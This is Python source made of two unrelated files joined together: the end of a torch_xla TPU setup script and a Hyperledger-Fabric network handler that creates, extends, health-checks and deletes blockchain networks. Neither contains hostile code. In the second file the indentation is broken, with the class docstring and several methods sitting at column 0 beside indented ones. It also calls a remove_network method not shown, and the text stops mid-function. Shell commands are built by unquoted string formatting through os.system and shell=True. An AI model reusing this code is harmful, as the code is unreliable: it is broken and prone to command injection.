  version_regex = re.compile(r'^(\d+\.)+\d+$')
  if not version_regex.match(version):
    raise ValueError(f'{version} is an invalid torch_xla version pattern')
  return VersionConfig(version, f'pytorch-{version}')
def parse_env_tpu_ip():
  """Extract the TPU's internal IP address from the TPU_NAME env variable.

  In both Colab and Kaggle: TPU_NAME='grpc://abc.def.ghi.jkl:8470'

  Raises:
    ValueError: if TPU_NAME is unset or does not match the expected form
      (previously an unset TPU_NAME crashed with TypeError from
      re.match(None) instead of the intended ValueError).
  """
  tpu_addr = os.environ.get('TPU_NAME', None)
  # Raw string so the \d escapes are taken literally by the regex engine.
  tpu_ip_regex = re.compile(r'grpc://(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}):8470')
  m_tpu_ip = tpu_ip_regex.match(tpu_addr) if tpu_addr else None
  if not m_tpu_ip:
    raise ValueError('TPU not found.')
  return m_tpu_ip.group(1)
def install_vm(version, apt_packages):
  """Download the torch/torch_xla/torchvision wheels from GCS, install them,
  then install the requested apt packages on this VM."""
  torch_whl = TORCH_WHEEL_TMPL.format(whl_version=version.wheels)
  torch_xla_whl = TORCH_XLA_WHEEL_TMPL.format(whl_version=version.wheels)
  torchvision_whl = TORCHVISION_WHEEL_TMPL.format(whl_version=version.wheels)
  wheels = [torch_whl, torch_xla_whl, torchvision_whl]

  installation_cmds = [['pip', 'uninstall', '-y', 'torch', 'torchvision']]
  # Fetch each wheel from the distribution bucket, then install them in order.
  installation_cmds.extend(
      ['gsutil', 'cp', os.path.join(DIST_BUCKET, whl), '.'] for whl in wheels)
  installation_cmds.extend(['pip', 'install', whl] for whl in wheels)
  installation_cmds.append(['apt-get', 'install', '-y'] + list(apt_packages))
  for cmd in installation_cmds:
    subprocess.call(cmd)
def run_setup(args):
  """Resolve the requested version, then update the TPU runtime and the VM in parallel."""
  version = get_version(args.version)
  tpu_ip = args.tpu_ip or parse_env_tpu_ip()

  print('Updating TPU and VM. This may take around 2 minutes.')
  # The TPU-side update runs in the background while the VM installs wheels.
  updater = threading.Thread(target=update_tpu_runtime, args=(tpu_ip, version,))
  updater.start()
  install_vm(version, args.apt_packages)
  updater.join()
if __name__ == '__main__':
  # Command-line entry point: parse the desired torch_xla version, the apt
  # packages to install, and an optional explicit TPU IP, then run setup.
  parser = argparse.ArgumentParser()
  parser.add_argument(
      '--version',
      type=str,
      default='20200325',
      help='Versions to install (nightly, release version, or YYYYMMDD).',
  )
  parser.add_argument(
      '--apt-packages',
      nargs='+',
      default=['libomp5'],
      help='List of apt packages to install',
  )
  parser.add_argument(
      '--tpu-ip',
      type=str,
      help='TPU internal ip address',
  )
  args = parser.parse_args()
  run_setup(args)
|
blockchain_network.py | from threading import Thread
import time
import socket
import shutil
import requests
from agent.docker.blockchain_network import NetworkOnDocker
from agent.k8s.blockchain_network import NetworkOnKubenetes
from modules.models import modelv2
from modules.organization import organizationHandler as org_handler
import datetime
from common import fabric_network_define as file_define
from common import CLUSTER_PORT_START, CLUSTER_PORT_STEP, WORKER_TYPE_K8S
import json
import logging
import os
from subprocess import call
from common import log_handler, LOG_LEVEL
from modules import host_handler
logger = logging.getLogger(__name__)
logger.setLevel(LOG_LEVEL)
logger.addHandler(log_handler)
PEER_NODE_HOSTPORT_NUM = 2
ORDERER_NODE_HOSTPORT_NUM = 1
CA_NODE_HOSTPORT_NUM = 1
COUCHDB_NODE_HOSTPORT_NUM = 1
PEER_NODE_HOSTPORT_NUM_WITH_CCLISTEN = 3
agent_cls = {
'docker': NetworkOnDocker,
'kubenetes': NetworkOnKubenetes
}
fabric_image_version = {
'v1.1': '1.1.0',
'v1.4': '1.4.2'
}
# CELLO_MASTER_FABRIC_DIR is mounted by nfs container as '/'
CELLO_MASTER_FABRIC_DIR = '/opt/fabric/'
CELLO_SECRET_FOR_TOKEN_DIR = '/opt/secret/'
def health_check():
    """TCP-probe every blockchain network's service endpoints and update the
    per-endpoint and per-network `healthy` flags in the database.

    BUGFIX: the per-network tail previously ended with `return`, so only the
    FIRST network was ever health-checked; the loop now continues through all
    networks. Fabric-1.4 'cc_listen' peer ports are skipped (always marked
    healthy) because they are not meaningful to probe.
    """
    networks = modelv2.BlockchainNetwork.objects().all()
    if not networks:
        print("no blockchain !!")
        time.sleep(10)
        return
    for network in networks:
        service_endpoints = modelv2.ServiceEndpoint.objects(network=network)
        if not service_endpoints:
            network.update(set__healthy=False)
            print("no endpoints !!")
            continue
        end_healthy = True
        healthy = False
        time.sleep(5)
        for ep in service_endpoints:
            # event port is not needed in fabric 1.4
            # don't do health check on event port to avoid health check fail on fabric 1.3 later
            if ep.service_type == 'peer' and ep.peer_port_proto == 'cc_listen':
                ep.update(set__healthy=True)
                continue
            ip = ep.service_ip
            port = ep.service_port
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            try:
                sock.connect((ip, port))
                healthy = True
                end_healthy = healthy and end_healthy
                ep.update(set__healthy=True)
            except Exception as e:
                logger.error("connect {}:{} fail, reason {}".format(ip, port, e))
                healthy = False
                ep.update(set__healthy=False)
            finally:
                sock.close()
        # NOTE: as in refresh_health, `healthy` reflects only the last probed
        # endpoint; `end_healthy` (all-endpoints AND) is computed but unused.
        if not healthy:
            network.update(set__healthy=False)
        else:
            network.update(set__healthy=True)
class BlockchainNetworkHandler(object):
""" Main handler to operate the cluster in pool
"""
    def __init__(self):
        # Per-host-type agents used to drive all network operations below.
        # NOTE(review): the module-level agent_cls map spells its key
        # 'kubenetes' while this dict uses 'kubernetes' — confirm which
        # spelling host.type actually carries at runtime.
        self.host_agents = {
            'docker': NetworkOnDocker(),
            'kubernetes': NetworkOnKubenetes()
        }
def _schema(self, doc, many=False):
network_schema = modelv2.BlockchainNetworkSchema(many=many)
return network_schema.dump(doc).data
    def schema(self, doc, many=False):
        """Public serialization entry point; delegates to _schema()."""
        return self._schema(doc, many)
def endports_schema(self, doc, many=False):
endports_schema = modelv2.ServiceEndpointSchema(many=many)
return endports_schema.dump(doc).data
# TODO: MODIFY THIS METHOD
def find_free_start_ports(self, number, host):
""" Find the first available port for a new cluster api
This is NOT lock-free. Should keep simple, fast and safe!
Check existing cluster records in the host, find available one.
:param host_id: id of the host
:param number: Number of ports to get
:return: The port list, e.g., [7050, 7150, ...]
"""
logger.debug("Find {} start ports ".format(number))
networks_exists = modelv2.BlockchainNetwork.objects(host=host)
ports_existed = [service.service_port for service in
modelv2.ServiceEndpoint.objects(network__in=networks_exists)]
logger.debug("The ports existed: {}".format(ports_existed))
# available host port range is 1~65535, this function adpots
# start port is 7050, port step is 1, so available port number
# is (65535-30000)/1=35535, considering the network scale,
# setting the most available host port is 30000
if len(ports_existed) + number >= 30000:
logger.warning("Too much ports are already in used.")
return []
candidates = [CLUSTER_PORT_START + i * CLUSTER_PORT_STEP
for i in range(len(ports_existed) + number)]
result = list(filter(lambda x: x not in ports_existed, candidates))
logger.debug("Free ports are {}".format(result[:number]))
return result[:number]
    def delete(self, network):
        """ Delete a cluster instance
        Clean containers, remove db entry. Only operate on active host.
        :param network: the BlockchainNetwork document to delete
        :return: None
        :raises Exception: re-raised after marking the network status 'error'
        """
        logger.debug("Delete cluster: id={}".format(network.id))
        network.update(set__status='deleting')
        net_id = network.id
        try:
            #self.host_agents[host.type].delete(network)
            # remove cluster info from host
            logger.info("remove network from host, network:{}".format(network.id))
            # if org has referenced network, remove
            for org_id in network.peer_orgs:
                peer_org = org_handler().schema(org_handler().get_by_id(org_id))
                host_id = peer_org['host_id']
                host_handler.refresh_status(host_id)
                host = host_handler.get_active_host_by_id(host_id)
                host.update(pull__clusters=network.id)
                self.host_agents[host.type].delete_peer_org(peer_org, host, net_id)
                org_obj = modelv2.Organization.objects.get(id=org_id)
                org_obj.update(unset__network=network.id)
            for org_id in network.orderer_orgs:
                orderer_org = org_handler().schema(org_handler().get_by_id(org_id))
                host_id = orderer_org['host_id']
                host_handler.refresh_status(host_id)
                host = host_handler.get_active_host_by_id(host_id)
                consensus_type = network.consensus_type
                host.update(pull__clusters=network.id)
                self.host_agents[host.type].delete_orderer_org(orderer_org, consensus_type, host, net_id)
                org_obj = modelv2.Organization.objects.get(id=org_id)
                org_obj.update(unset__network=network.id)
            # Remove this network's data from the Userdashboard mongo database.
            self.userdashboard_mongo_delete(network.id)
            network.delete()
            # Wipe the network's crypto material from the shared fabric dir.
            filepath = '{}{}'.format(CELLO_MASTER_FABRIC_DIR, network.id)
            os.system('rm -rf {}'.format(filepath))
            return
        except Exception as e:
            logger.info("remove network {} fail from host".format(network.id))
            network.update(set__status = 'error')
            raise e
def get_by_id(self, id):
""" Get a host
:param id: id of the doc
:return: serialized result or obj
"""
try:
ins = modelv2.BlockchainNetwork.objects.get(id=id)
except Exception:
logger.warning("No network found with id=" + id)
return None
return ins
def get_endpoints_list(self, filter_data={}):
""" List orgs with given criteria
:param filter_data: Image with the filter properties
:return: iteration of serialized doc
"""
logger.info("filter data {}".format(filter_data))
network = modelv2.BlockchainNetwork.objects.get(id=filter_data)
serviceEndpoints = modelv2.ServiceEndpoint.objects(network=network)
return self.endports_schema(serviceEndpoints, many=True)
    def refresh_health(self, network):
        """TCP-probe every service endpoint of `network` and update the
        network's `healthy` flag accordingly.

        NOTE(review): when the network has no endpoints it is marked
        unhealthy but execution falls through (no early return); the loop
        then does nothing and the final branch marks it unhealthy again, so
        the net effect is the same.
        """
        service_endpoints = modelv2.ServiceEndpoint.objects(network=network)
        if not service_endpoints:
            network.update(set__healthy=False)
        end_healthy = True
        healthy = False
        for ep in service_endpoints:
            # event port is not needed in fabric 1.4
            # don't do health check on event port to avoid health check fail on fabric 1.3 later
            if ep.service_type == 'peer' and ep.peer_port_proto == 'event':
                continue
            ip = ep.service_ip
            port = ep.service_port
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            try:
                sock.connect((ip, port))
                logger.info("connect {}:{} succeed".format(ip, port))
                healthy = True
                end_healthy = healthy and end_healthy
            except Exception as e:
                logger.error("connect {}:{} fail, reason {}".format(ip, port, e))
                healthy = False
                # break
            finally:
                sock.close()
        # `healthy` reflects only the last probed endpoint; `end_healthy`
        # (AND over all endpoints) is computed but unused — TODO confirm intent.
        if not healthy:
            network.update(set__healthy=False)
            return
        else:
            network.update(set__healthy=True)
            return
    def _create_network(self, network_config, request_host_ports):
        """Worker (run on a background thread) that creates all orderer and
        peer org containers for a new network, then marks it running and
        schedules a delayed health probe.

        On any failure the partially-created network is deleted and the
        exception re-raised.
        """
        net_id = network_config['id']
        network = modelv2.BlockchainNetwork.objects.get(id=net_id)
        try:
            #self.host_agents[host.type].create(network_config, request_host_ports)
            # # service urls can only be calculated after service is create
            # if host.type == WORKER_TYPE_K8S:
            #     service_urls = self.host_agents[host.type] \
            #         .get_services_urls(net_id)
            # else:
            #     service_urls = self.gen_service_urls(net_id)
            net_id = network_config['id']
            net_name = network_config['name']
            couchdb_enabled = False
            if network_config['db_type'] == 'couchdb':
                couchdb_enabled = True
            fabric_version = fabric_image_version[network_config['fabric_version']]
            consensus_type = network_config['consensus_type']
            # portid is a single-element list used as a mutable port-index
            # counter shared with the agent calls below.
            portid = []
            portid.append(0)
            for orderer_org in network_config['orderer_org_dicts']:
                host_id = orderer_org['host_id']
                host_handler.refresh_status(host_id)
                host = host_handler.get_active_host_by_id(host_id)
                host.update(add_to_set__clusters=[net_id])
                self.host_agents[host.type].create_orderer_org(orderer_org, consensus_type, host, net_id, net_name,
                                                               fabric_version, request_host_ports, portid)
            # Give the orderers a moment to come up before starting peers.
            time.sleep(5)
            for peer_org in network_config['peer_org_dicts']:
                host_id = peer_org['host_id']
                peer_num = peer_org['peerNum']
                host_handler.refresh_status(host_id)
                host = host_handler.get_active_host_by_id(host_id)
                host.update(add_to_set__clusters=[net_id])
                self.host_agents[host.type].create_peer_org(peer_org, couchdb_enabled, host, net_id, net_name,
                                                            fabric_version, request_host_ports, portid, peer_num)
            network.update(set__status='running')
            # Change (zsh): to allow org operations while the network is still
            # being created, attaching the network to each org was moved
            # earlier (into create()); the old in-place code is kept below.
            # for peer_org in network_config['peer_org_dicts']:
            #     org_obj = modelv2.Organization.objects.get(id=peer_org['id'])
            #     org_obj.update(set__network=network)
            # for orderer_org in network_config['orderer_org_dicts']:
            #     org_obj = modelv2.Organization.objects.get(id=orderer_org['id'])
            #     org_obj.update(set__network=network)
            logger.info("Create network OK, id={}".format(net_id))
            def check_health_work(network):
                # Delayed health probe: wait for the containers to settle first.
                time.sleep(180)
                self.refresh_health(network)
            t = Thread(target=check_health_work, args=(network,))
            t.start()
        except Exception as e:
            logger.error("network {} create failed for {}".format(net_id, e))
            # Roll back the partially-created network, then re-raise.
            self.delete(network)
            raise e
    def _update_network(self, network_config, request_host_ports):
        """Worker (run on a background thread) that adds new orgs' containers
        to an existing network (used by addorgtonetwork) and attaches the
        network to those orgs once they are running."""
        net_id = network_config['id']
        network = modelv2.BlockchainNetwork.objects.get(id=net_id)
        try:
            #self.host_agents[host.type].update(network_config, request_host_ports)
            # # service urls can only be calculated after service is create
            # if host.type == WORKER_TYPE_K8S:
            #     service_urls = self.host_agents[host.type] \
            #         .get_services_urls(net_id)
            # else:
            #     service_urls = self.gen_service_urls(net_id)
            net_id = network_config['id']
            net_name = network_config['name']
            couchdb_enabled = False
            if network_config['db_type'] == 'couchdb':
                couchdb_enabled = True
            fabric_version = fabric_image_version[network_config['fabric_version']]
            # Shared mutable port-index counter (single-element list).
            portid = []
            portid.append(0)
            for peer_org in network_config['peer_org_dicts']:
                host_id = peer_org['host_id']
                peer_num = peer_org['peerNum']
                host = host_handler.get_active_host_by_id(host_id)
                host.update(add_to_set__clusters=[net_id])
                self.host_agents[host.type].create_peer_org(peer_org, couchdb_enabled, host, net_id, net_name,
                                                            fabric_version, request_host_ports, portid, peer_num)
            network.update(set__status='running')
            for peer_org in network_config['peer_org_dicts']:
                org_obj = modelv2.Organization.objects.get(id=peer_org['id'])
                org_obj.update(set__network=network)
            for orderer_org in network_config['orderer_org_dicts']:
                org_obj = modelv2.Organization.objects.get(id=orderer_org['id'])
                org_obj.update(set__network=network)
            logger.info("Update network OK, id={}".format(net_id))
        except Exception as e:
            logger.error("network {} update failed for {}".format(net_id, e))
            # will not call self.delete(network) in case of nested exception
            #self.delete(network)
            raise e
    def _update_network_for_addpeers(self, network_config, request_host_ports):
        """Worker (run on a background thread) that adds extra peer containers
        to one existing org of a running network (used by addpeertonetwork)."""
        net_id = network_config['id']
        network = modelv2.BlockchainNetwork.objects.get(id=net_id)
        try:
            #self.host_agents[host.type].update(network_config, request_host_ports)
            # # service urls can only be calculated after service is create
            # if host.type == WORKER_TYPE_K8S:
            #     service_urls = self.host_agents[host.type] \
            #         .get_services_urls(net_id)
            # else:
            #     service_urls = self.gen_service_urls(net_id)
            net_id = network_config['id']
            net_name = network_config['name']
            peer_num = network_config['peer_num']
            peer_org = network_config['peer_org_dict']
            couchdb_enabled = False
            if network_config['db_type'] == 'couchdb':
                couchdb_enabled = True
            fabric_version = fabric_image_version[network_config['fabric_version']]
            # Shared mutable port-index counter (single-element list).
            portid = []
            portid.append(0)
            host_id = peer_org['host_id']
            host = host_handler.get_active_host_by_id(host_id)
            host_handler.refresh_status(host_id)
            self.host_agents[host.type].create_peer_org(peer_org, couchdb_enabled, host, net_id, net_name,
                                                        fabric_version, request_host_ports, portid, peer_num)
            network.update(set__status='running')
            logger.info("Update network OK, id={}".format(net_id))
        except Exception as e:
            logger.error("network {} update failed for {}".format(net_id, e))
            # will not call self.delete(network) in case of nested exception
            #self.delete(network)
            raise e
    def create(self, id, name, description, fabric_version,
               orderer_orgs, peer_orgs, host, consensus_type, db_type, create_ts):
        """Create a new blockchain network: persist the record, generate its
        crypto material and configuration files, then launch container
        creation on a background thread (self._create_network).

        :param id: new network id (also its directory name under CELLO_MASTER_FABRIC_DIR)
        :param orderer_orgs: list of orderer org ids to include
        :param peer_orgs: list of peer org ids to include
        :param host: host document the network is bound to
        :return: serialized network document (creation continues in background)
        :raises Exception: when an org already belongs to a network, orderer
            domains clash, ports run out, or artifact generation fails
        """
        peer_org_dicts = []
        orderer_org_dicts = []
        for org_id in peer_orgs:
            peer_org_dict = org_handler().schema(org_handler().get_by_id(org_id))
            # A non-empty blockchain_network_id means this org was already
            # added to another network.
            if peer_org_dict['blockchain_network_id']:
                error_msg = ': this org has been added by another network!'
                raise Exception(error_msg)
            peer_org_dicts.append(peer_org_dict)
        for org_id in orderer_orgs:
            orderer_org_dict = org_handler().schema(org_handler().get_by_id(org_id))
            if orderer_org_dict['blockchain_network_id']:
                error_msg = ': this org has been added by another network!'
                raise Exception(error_msg)
            orderer_org_dicts.append(orderer_org_dict)
        network = modelv2.BlockchainNetwork(id=id,
                                            name=name,
                                            description=description,
                                            fabric_version=fabric_version,
                                            orderer_orgs=orderer_orgs,
                                            peer_orgs=peer_orgs,
                                            host=host,
                                            consensus_type=consensus_type,
                                            db_type=db_type,
                                            create_ts=create_ts,
                                            status="creating")
        network.save()
        order_orgs_domain = []
        for each in orderer_org_dicts:
            if each['domain'] not in order_orgs_domain:
                order_orgs_domain.append(each['domain'])
            else:
                network.delete()
                error_msg = ': orderer\'s domain in one network can not be same!'
                raise Exception(error_msg)
        couchdb_enabled = False
        if db_type == 'couchdb':
            couchdb_enabled = True
        ### get fabric service ports
        peer_org_num = len(peer_org_dicts)
        peer_num = 0
        orderer_num = 0
        # Change (zsh): attaching the network to each org originally happened
        # in _create_network; moved earlier to here.
        for org in peer_org_dicts:
            peer_num += org['peerNum']
            org_obj = modelv2.Organization.objects.get(id=org['id'])
            org_obj.update(set__network=network)
        for org in orderer_org_dicts:
            orderer_num += len(org['ordererHostnames'])
            org_obj = modelv2.Organization.objects.get(id=org['id'])
            org_obj.update(set__network=network)
        if couchdb_enabled is True:
            request_host_port_num = peer_org_num * CA_NODE_HOSTPORT_NUM + \
                                    peer_num * PEER_NODE_HOSTPORT_NUM + \
                                    peer_num * COUCHDB_NODE_HOSTPORT_NUM + \
                                    orderer_num * ORDERER_NODE_HOSTPORT_NUM
        else:
            request_host_port_num = peer_org_num * CA_NODE_HOSTPORT_NUM + \
                                    peer_num * PEER_NODE_HOSTPORT_NUM + \
                                    orderer_num * ORDERER_NODE_HOSTPORT_NUM
        request_host_ports = self.find_free_start_ports (request_host_port_num, host)
        if len(request_host_ports) != request_host_port_num:
            error_msg = "no enough ports for network service containers"
            logger.error(error_msg)
            raise Exception(error_msg)
        # create persistent volume path for peer and orderer node
        # TODO : code here
        logger.info(" before function file_define.commad_create_path,and path is")
        # create public.key or private.key
        isExist = file_define.creat_secret_key_files()
        if not isExist:
            logger.error(" after function file_define.creat_secret_key_files, and it is {} ".format(isExist))
        # create filepath with network_id at path FABRIC_DIR
        filepath = file_define.commad_create_path(id)
        print("filepath = {}".format(filepath))
        logger.info(" after function file_define.commad_create_path,and path is {}".format(filepath))
        # create crypto-config.yaml file at filepath
        file_define.dump_crypto_config_yaml_file(filepath, peer_org_dicts, orderer_org_dicts)
        # create configtx.yaml file
        file_define.dump_configtx_yaml_file(filepath, consensus_type, peer_org_dicts, orderer_org_dicts,
                                            fabric_version, request_host_ports)
        # create channel-artifacts path
        blockGenesis_filepath = '{}{}/channel-artifacts'.format(CELLO_MASTER_FABRIC_DIR, id)
        try:
            os.system('mkdir -p {}'.format(blockGenesis_filepath))
        except:
            # NOTE(review): this failure is swallowed — error_msg is assigned
            # but never raised or logged; confirm whether that is intended.
            error_msg = 'blockGenesis_filepath file create failed.'
            # raise FileOperaterFailed(error_msg)
        try:
            fabric_version_dir = fabric_version.replace('.', '_')
            # change work dir to '/opt'
            # origin_dir = os.getcwd()
            os.chdir(filepath)
            # print(os.getcwd())
            # create certificates
            call(["/opt/fabric_tools/{}/cryptogen".format(fabric_version_dir), "generate", "--config=./crypto-config.yaml"])
            # create genesis.block and channel configuration blocks
            call(["/opt/fabric_tools/{}/configtxgen".format(fabric_version_dir), "-profile", "TwoOrgsOrdererGenesis", "-outputBlock",
                  "./channel-artifacts/genesis.block"])
            # call(["/opt/configtxgen","-profile","TwoOrgsChannel","-outputCreateChannelTx","./channel-artifacts/channel.tx","-channelID","mychannel"])
            # call(["/opt/configtxgen","-profile","TwoOrgsChannel","-outputAnchorPeersUpdate","./channel-artifacts/Org1MSPanchors.tx",\
            #      "-channelID","mychannel","-asOrg","Org1MSP"])
            # call(["/opt/configtxgen","-profile","TwoOrgsChannel","-outputAnchorPeersUpdate","./channel-artifacts/Org2MSPanchors.tx",\
            #      "-channelID","mychannel","-asOrg","Org2MSP"])
            # change back
            # for k8s orderer node to use genesis.block
            shutil.copy('{}/genesis.block'.format(blockGenesis_filepath), '{}{}/crypto-config/ordererOrganizations/'.
                        format(CELLO_MASTER_FABRIC_DIR, id))
            # os.chdir(origin_dir)
        except Exception as e:
            error_msg = 'create certificate or genesis block failed!'
            # NOTE(review): remove_network is not defined in the visible part
            # of this class — confirm it exists elsewhere.
            self.remove_network(network)
            raise Exception(error_msg)
        try:
            # create fabric-ca-server-config.yaml file
            file_define.fabric_ca_config_files(id, fabric_version, CELLO_MASTER_FABRIC_DIR, peer_org_dicts)
        except:
            error_msg = 'create fabric_ca_config_files failed!.'
            self.remove_network(network)
            raise Exception(error_msg)
        # use network model to get?
        # no. network models only have org ids, no details needed
        network_config = {'id':id, 'name': name, 'fabric_version': fabric_version,
                          'orderer_org_dicts': orderer_org_dicts, 'peer_org_dicts': peer_org_dicts,
                          'consensus_type': consensus_type, 'db_type': db_type, 'host':host}
        t = Thread(target=self._create_network, args=(network_config, request_host_ports))
        t.start()
        return self._schema(network)
def addorgtonetwork(self, id, peer_orgs, orderer_orgs):
ins = modelv2.BlockchainNetwork.objects.get(id=id)
host = ins.host
consensus_type = ins.consensus_type
fabric_version = ins.fabric_version
name = ins.name
peer_org_dicts = []
orderer_org_dicts = []
peer_orgs_temp = ins.peer_orgs
orderer_orgs_temp = ins.orderer_orgs
if peer_orgs != None:
for org_id in peer_orgs:
peer_org_dict = org_handler().schema(org_handler().get_by_id(org_id))
peer_org_dicts.append(peer_org_dict)
peer_orgs_temp.append(org_id)
if orderer_orgs != None:
org_id = orderer_orgs
orderer_org_dict = org_handler().schema(org_handler().get_by_id(org_id))
orderer_org_dicts.append(orderer_org_dict)
orderer_orgs_temp.append(org_id)
db_type = ins.db_type
couchdb_enabled = False
if db_type == 'couchdb':
couchdb_enabled = True
### get fabric service ports
peer_org_num = len(peer_org_dicts)
peer_num = 0
orderer_num = 0
for org in peer_org_dicts:
peer_num += org['peerNum']
for org in orderer_org_dicts:
orderer_num += len(org['ordererHostnames'])
if couchdb_enabled is True:
request_host_port_num = peer_org_num * CA_NODE_HOSTPORT_NUM + \
peer_num * PEER_NODE_HOSTPORT_NUM + \
peer_num * COUCHDB_NODE_HOSTPORT_NUM + \
orderer_num * ORDERER_NODE_HOSTPORT_NUM
else:
request_host_port_num = peer_org_num * CA_NODE_HOSTPORT_NUM + \
peer_num * PEER_NODE_HOSTPORT_NUM + \
orderer_num * ORDERER_NODE_HOSTPORT_NUM
request_host_ports = self.find_free_start_ports(request_host_port_num, host)
if len(request_host_ports) != request_host_port_num:
error_msg = "no enough ports for network service containers"
logger.error(error_msg)
raise Exception(error_msg)
#logger.info(" before function file_define.commad_create_path,and path is")
# create filepath with network_id at path FABRIC_DIR
filepath = file_define.commad_create_path(id)
print("filepath = {}".format(filepath))
#logger.info(" after function file_define.commad_create_path,and path is {}".format(filepath))
# create crypto-config.yaml file at filepath
file_define.update_crypto_config_yaml_file(filepath, peer_org_dicts, orderer_org_dicts)
# create configtx.yaml file
file_define.update_dump_configtx_yaml_file(filepath, peer_org_dicts, orderer_org_dicts, request_host_ports)
try:
# change work dir to '/opt'
origin_dir = os.getcwd()
os.chdir(filepath)
print(os.getcwd())
# create certificates
call("/opt/fabric_tools/v1_4/cryptogen extend --config=%s/crypto-config.yaml" % filepath, shell=True)
os.chdir(origin_dir)
#os.system('rm -r {}'.format(fileorgpath))
except:
error_msg = 'create certificate or genesis block failed!'
raise Exception(error_msg)
self.createyamlforneworgs(id, peer_orgs,orderer_orgs)
self.sys_channelInfo_update(id, peer_org_dicts)
ins.update(set__peer_orgs=peer_orgs_temp)
self.sys_channelOrderer_update(id, orderer_org_dicts, request_host_ports)
ins.update(set__orderer_orgs=orderer_orgs_temp)
try:
# create fabric-ca-server-config.yaml file
file_define.fabric_ca_config_files(id, fabric_version, CELLO_MASTER_FABRIC_DIR, peer_org_dicts)
except:
error_msg = 'create fabric_ca_config_files failed!.'
raise Exception(error_msg)
# use network model to get?
# network models only have org ids, no details needed
network_config = {'id':id, 'name': name, 'fabric_version': fabric_version,
'orderer_org_dicts': orderer_org_dicts, 'peer_org_dicts': peer_org_dicts,
'consensus_type': consensus_type, 'db_type': db_type, 'host':host}
t = Thread(target=self._update_network, args=(network_config, request_host_ports))
t.start()
return self._schema(ins)
def addpeertonetwork(self, id, peer_org, peers_num):
    """Add new peers to an organization of an existing blockchain network.

    Allocates host ports for the new peers (plus couchdb ports when the
    network uses couchdb), extends the crypto material with cryptogen,
    records the org CA's secret-key file name, and kicks off the actual
    container update on a background thread.

    :param id: id of the BlockchainNetwork to extend
    :param peer_org: id of the organization that receives the new peers
    :param peers_num: how many peers to add
    :return: serialized network object
    :raise Exception: when port allocation, certificate generation or
        CA key lookup fails
    """
    ins = modelv2.BlockchainNetwork.objects.get(id=id)
    host = ins.host
    fabric_version = ins.fabric_version
    name = ins.name
    peer_org_dict = org_handler().schema(org_handler().get_by_id(peer_org))
    db_type = ins.db_type
    couchdb_enabled = (db_type == 'couchdb')
    ### get fabric service ports
    peer_num = peers_num
    peer_org_dict['peerNum'] += peers_num
    request_host_port_num = peer_num * PEER_NODE_HOSTPORT_NUM
    if couchdb_enabled:
        # each couchdb side-car needs its own host ports as well
        request_host_port_num += peer_num * COUCHDB_NODE_HOSTPORT_NUM
    request_host_ports = self.find_free_start_ports(request_host_port_num, host)
    if len(request_host_ports) != request_host_port_num:
        error_msg = "no enough ports for network service containers"
        logger.error(error_msg)
        raise Exception(error_msg)
    # create filepath with network_id at path FABRIC_DIR
    filepath = file_define.commad_create_path(id)
    logger.info("filepath = {}".format(filepath))
    # extend crypto-config.yaml with the new peers
    file_define.update_crypto_file_for_addpeers(filepath, peer_org_dict, peers_num)
    origin_dir = os.getcwd()
    try:
        os.chdir(filepath)
        # generate certificates for the added peers
        call("/opt/fabric_tools/v1_4/cryptogen extend --config=%s/crypto-config.yaml" % filepath, shell=True)
    except Exception:
        error_msg = 'create certificate or genesis block failed!'
        logger.error(error_msg)
        raise Exception(error_msg)
    finally:
        # always restore the working directory, even on failure
        os.chdir(origin_dir)
    try:
        # find the org CA's generated secret key file (random name ending in _sk)
        sk_file = ''
        org_fullDomain_name = '.'.join([peer_org_dict['name'], peer_org_dict['domain']])
        ca_dir = '/opt/fabric/{net_dir}/crypto-config/peerOrganizations/{org_fullDomain_name}/ca/'. \
            format(net_dir=id, org_fullDomain_name=org_fullDomain_name)
        for f in os.listdir(ca_dir):
            if f.endswith("_sk"):
                sk_file = f
        peer_org_dict['sk_file'] = sk_file
    except Exception:
        # previous message ('create_userdashboard failed') was misleading
        error_msg = 'failed to locate CA secret key file!'
        logger.error(error_msg)
        raise Exception(error_msg)
    # network models only have org ids, no details needed
    network_config = {'id': id, 'name': name, 'fabric_version': fabric_version,
                      'peer_org_dict': peer_org_dict, 'peer_num': peers_num,
                      'db_type': db_type}
    t = Thread(target=self._update_network_for_addpeers, args=(network_config, request_host_ports))
    t.start()
    return self._schema(ins)
def createyamlforneworgs(self, id, peer_orgs, orderer_orgs):
    """Export configtx JSON definitions for newly added organizations.

    For every new peer org, and the first orderer org when given, this
    copies the freshly generated crypto material and configtx.yaml into a
    scratch directory, runs `configtxgen -printOrg` to produce the org's
    JSON definition under ../channel-artifacts/, then removes the scratch
    directory.

    :param id: network id (used as the working dir name under FABRIC_DIR)
    :param peer_orgs: list of peer org ids to export
    :param orderer_orgs: list of orderer org ids (only the first is used), or None
    :return: serialized network object
    :raise Exception: when the configtx JSON generation fails
    """
    ins = modelv2.BlockchainNetwork.objects.get(id=id)
    filepath = file_define.commad_create_path(id)
    logger.info("filepath = {}".format(filepath))
    for org_id in peer_orgs:
        peer_org_dict = org_handler().schema(org_handler().get_by_id(org_id))
        org_name = peer_org_dict['name']
        # peer MSP id convention: capitalized org name + 'MSP'
        mspid = '{}MSP'.format(org_name[0:1].upper() + org_name[1:])
        org_dir = '{}.{}'.format(org_name, peer_org_dict['domain'])
        self._print_org_json(filepath, org_id, 'peerOrganizations', org_dir, mspid, org_name)
    if orderer_orgs is not None:
        org_id = orderer_orgs[0]
        orderer_org_dict = org_handler().schema(org_handler().get_by_id(org_id))
        org_name = orderer_org_dict['name']
        # orderer MSP id convention: capitalized org name + 'Org'
        mspid = '{}Org'.format(org_name[0:1].upper() + org_name[1:])
        # orderer crypto material lives directly under the domain dir
        self._print_org_json(filepath, org_id, 'ordererOrganizations',
                             orderer_org_dict['domain'], mspid, org_name)
    return self._schema(ins)

def _print_org_json(self, filepath, org_id, org_subdir, org_dir, mspid, org_name):
    """Run configtxgen -printOrg for one org inside a scratch copy of the network files."""
    scratch = '{}/{}'.format(filepath, org_id)
    os.system('mkdir -p {}/crypto-config/{}/'.format(scratch, org_subdir))
    origin_dir = os.getcwd()
    try:
        os.chdir(scratch)
        logger.info(os.getcwd())
        # NOTE(review): this export only affects a throw-away child shell and does
        # NOT change this process' environment; configtxgen below presumably
        # picks up configtx.yaml from the current working directory -- confirm.
        os.system("export FABRIC_CFG_PATH=$PWD")
        os.system('cp -r {}/crypto-config/{}/{} {}/crypto-config/{}/'.format(
            filepath, org_subdir, org_dir, scratch, org_subdir))
